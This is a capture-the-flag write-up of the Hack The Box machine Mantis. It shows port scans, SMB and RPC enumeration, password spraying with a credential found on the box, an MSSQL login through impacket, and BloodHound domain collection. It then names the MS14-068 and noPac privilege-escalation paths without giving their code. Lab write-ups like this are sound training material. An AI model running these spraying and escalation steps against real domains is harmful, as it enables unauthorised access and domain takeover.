Mantis can definitely be one of the more challenging machines for some users. For successful exploitation, a fair bit of knowledge or research of Windows Servers and the domain controller system is required.
Enumeration
Scope
IP Address: 10.10.10.52
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1337/tcp open waste
1433/tcp open ms-sql-s
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,88,139,389,445,1433,8080 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-13 04:21:49Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
PORT STATE SERVICE VERSION
1337/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
|_ssl-date: 2024-07-13T04:22:12+00:00; +4s from scanner time.
| ms-sql-ntlm-info:
| 10.10.10.52:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-07-13T04:14:57
| Not valid after: 2054-07-13T04:14:57
| MD5: 5cef:fbd5:1743:b5a4:ac1d:4a7a:92eb:e950
|_SHA-1: 8a80:3d0c:f5f9:f67c:e526:9d2a:d5b9:f582:b093:685c
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-07-13T04:22:04
|_ start_date: 2024-07-13T04:14:30
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2024-07-13T00:22:05-04:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: mean: 48m05s, deviation: 1h47m22s, median: 3s
* Open ports: 53,88,139,389,445,1433,8080
* UDP Open ports: 53,88,123,389
* Services: DNS - RPC - SMB - LDAP - Kerberos - HTTP-PROXY
* Versions: Windows Server 2008 R2 SP1 - Microsoft SQL Server 2014
* Important Notes: FQDN: mantis.htb.local - Domain name: htb.local
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
SMB Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.52 445 MANTIS [+] htb.local\:
SMB 10.10.10.52 445 MANTIS [-] Error enumerating shares: STATUS_ACCESS_DENIED
I decoded this weird string in the dev_notes file and the output seems to be a hash but we I checked for its type with hashid it told me it's known hash.
I didn't have usernames list yet to test the password I found with as kerbrute didn't show me any user when using jsmith.txt wordlist, So I will try bigger list
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ crackmapexec smb $ip -u users.lst -p 'm$$ql_S@_P@ssW0rd!'
SMB 10.10.10.52 445 MANTIS [-] htb.local\James:m$$ql_S@_P@ssW0rd! STATUS_LOGON_FAILURE
SMB 10.10.10.52 445 MANTIS [-] htb.local\Administrator:m$$ql_S@_P@ssW0rd! STATUS_LOGON_FAILURE
SMB 10.10.10.52 445 MANTIS [-] htb.local\mantis:m$$ql_S@_P@ssW0rd! STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ crackmapexec mssql $ip -u users.lst -p 'm$$ql_S@_P@ssW0rd!'
MSSQL 10.10.10.52 1433 MANTIS [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
MSSQL 10.10.10.52 1433 MANTIS [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
MSSQL 10.10.10.52 1433 MANTIS [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
In the notes we found, it tells us that the username of mssql is admin and orcharddb database name
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ impacket-mssqlclient htb.local/admin:'m$$ql_S@_P@ssW0rd!'@$ip -db orcharddb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL (admin admin@orcharddb)>
I fire up bloodhound.py to enumerate the domain and feed its data to bloodhound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ bloodhound-python -u 'james' -p 'J@m3s_P@ssW0rd!' -ns $ip -d htb.local -c all
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ zip mantis.zip *.json
I found that user JamesCanRDP to the machine but when check RDP port I found it closed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ nmap -p3389 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 01:35 EDT
Nmap scan report for 10.10.10.52
Host is up (0.067s latency).
PORT STATE SERVICE
3389/tcp closed ms-wbt-server
Privilege Escalation
I couldn't go further anymore, So I got a hint from community that there is a CVE affected kerberos which allow us to get golden ticket without being an admin (MS14-068).
Useful post to configure our kali to work properly:
POC for the vulnerability:
Follow up the post above to get system access but It didn't work for me cause it's an old vulnerability and I couldn't run this python script, So I used unintended path using noPac exploit to get system account.
